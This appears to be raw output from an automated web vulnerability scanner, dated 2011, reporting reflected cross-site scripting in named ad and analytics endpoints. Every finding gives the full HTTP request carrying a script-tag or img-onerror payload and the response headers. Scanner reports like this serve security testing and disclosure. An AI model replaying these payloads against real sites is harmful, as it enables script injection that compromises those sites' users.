GET /beacon.js?c1=876688<script>alert(1)</script>2d0cdbe6589&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:51 GMT Date: Sun, 27 Feb 2011 16:44:51 GMT Connection: close Content-Length: 3594
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload a70f0<script>alert(1)</script>5846377f9ec was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955a70f0<script>alert(1)</script>5846377f9ec&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:02 GMT Date: Sun, 27 Feb 2011 16:45:02 GMT Connection: close Content-Length: 3594
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 4dfb7<script>alert(1)</script>028085d548b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15=4dfb7<script>alert(1)</script>028085d548b HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:02 GMT Date: Sun, 27 Feb 2011 16:45:02 GMT Connection: close Content-Length: 3594
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload bc9c3<script>alert(1)</script>3733a91cc15 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113bc9c3<script>alert(1)</script>3733a91cc15&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:52 GMT Date: Sun, 27 Feb 2011 16:44:52 GMT Connection: close Content-Length: 3594
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload aecfe<script>alert(1)</script>494c6cd0f61 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113&c3=20aecfe<script>alert(1)</script>494c6cd0f61&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:53 GMT Date: Sun, 27 Feb 2011 16:44:53 GMT Connection: close Content-Length: 3594
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 8fcd2<script>alert(1)</script>164c2634538 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113&c3=20&c4=48378fcd2<script>alert(1)</script>164c2634538&c5=28380&c6=&c10=175955&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:59 GMT Date: Sun, 27 Feb 2011 16:44:59 GMT Connection: close Content-Length: 3594
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 6569b<script>alert(1)</script>98b62b0333a was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=283806569b<script>alert(1)</script>98b62b0333a&c6=&c10=175955&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:00 GMT Date: Sun, 27 Feb 2011 16:45:00 GMT Connection: close Content-Length: 3594
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ed016<script>alert(1)</script>37dd9a94977 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=ed016<script>alert(1)</script>37dd9a94977&c10=175955&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:01 GMT Date: Sun, 27 Feb 2011 16:45:01 GMT Connection: close Content-Length: 3594
The value of the BnId request parameter is copied into the HTML document as plain text between tags. The payload d23ea<img%20src%3da%20onerror%3dalert(1)>11242cb47aa was submitted in the BnId parameter. This input was echoed as d23ea<img src=a onerror=alert(1)>11242cb47aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=d23ea<img%20src%3da%20onerror%3dalert(1)>11242cb47aa HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:45:07 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56347
The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 94f39<img%20src%3da%20onerror%3dalert(1)>6a768a93c3 was submitted in the REST URL parameter 10. This input was echoed as 94f39<img src=a onerror=alert(1)>6a768a93c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink94f39<img%20src%3da%20onerror%3dalert(1)>6a768a93c3/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:26 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56525
The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload 5bcaa<img%20src%3da%20onerror%3dalert(1)>df3967d3b03 was submitted in the REST URL parameter 11. This input was echoed as 5bcaa<img src=a onerror=alert(1)>df3967d3b03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/51135bcaa<img%20src%3da%20onerror%3dalert(1)>df3967d3b03/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:31 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload 69f84<img%20src%3da%20onerror%3dalert(1)>faa1bc042a8 was submitted in the REST URL parameter 12. This input was echoed as 69f84<img src=a onerror=alert(1)>faa1bc042a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/183831369f84<img%20src%3da%20onerror%3dalert(1)>faa1bc042a8/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:38 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 13 is copied into the HTML document as plain text between tags. The payload 7ba35<img%20src%3da%20onerror%3dalert(1)>b5fe03ca28a was submitted in the REST URL parameter 13. This input was echoed as 7ba35<img src=a onerror=alert(1)>b5fe03ca28a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/07ba35<img%20src%3da%20onerror%3dalert(1)>b5fe03ca28a/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:45 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 9ec74<img%20src%3da%20onerror%3dalert(1)>e70d7034ce2 was submitted in the REST URL parameter 14. This input was echoed as 9ec74<img src=a onerror=alert(1)>e70d7034ce2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/5299ec74<img%20src%3da%20onerror%3dalert(1)>e70d7034ce2/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:52 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 15 is copied into the HTML document as plain text between tags. The payload 16922<img%20src%3da%20onerror%3dalert(1)>f636662a426 was submitted in the REST URL parameter 15. This input was echoed as 16922<img src=a onerror=alert(1)>f636662a426 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId16922<img%20src%3da%20onerror%3dalert(1)>f636662a426=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:59 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 467b6<img%20src%3da%20onerror%3dalert(1)>6c593df3db8 was submitted in the REST URL parameter 4. This input was echoed as 467b6<img src=a onerror=alert(1)>6c593df3db8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif467b6<img%20src%3da%20onerror%3dalert(1)>6c593df3db8/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:45:48 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 18572
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e8572<img%20src%3da%20onerror%3dalert(1)>efc59e097e0 was submitted in the REST URL parameter 5. This input was echoed as e8572<img src=a onerror=alert(1)>efc59e097e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aole8572<img%20src%3da%20onerror%3dalert(1)>efc59e097e0/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:45:54 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56534
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1abe0<img%20src%3da%20onerror%3dalert(1)>6a7add9aecc was submitted in the REST URL parameter 6. This input was echoed as 1abe0<img src=a onerror=alert(1)>6a7add9aecc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id1abe0<img%20src%3da%20onerror%3dalert(1)>6a7add9aecc/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:02 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3ffef<img%20src%3da%20onerror%3dalert(1)>0560571b3eb was submitted in the REST URL parameter 7. This input was echoed as 3ffef<img src=a onerror=alert(1)>0560571b3eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
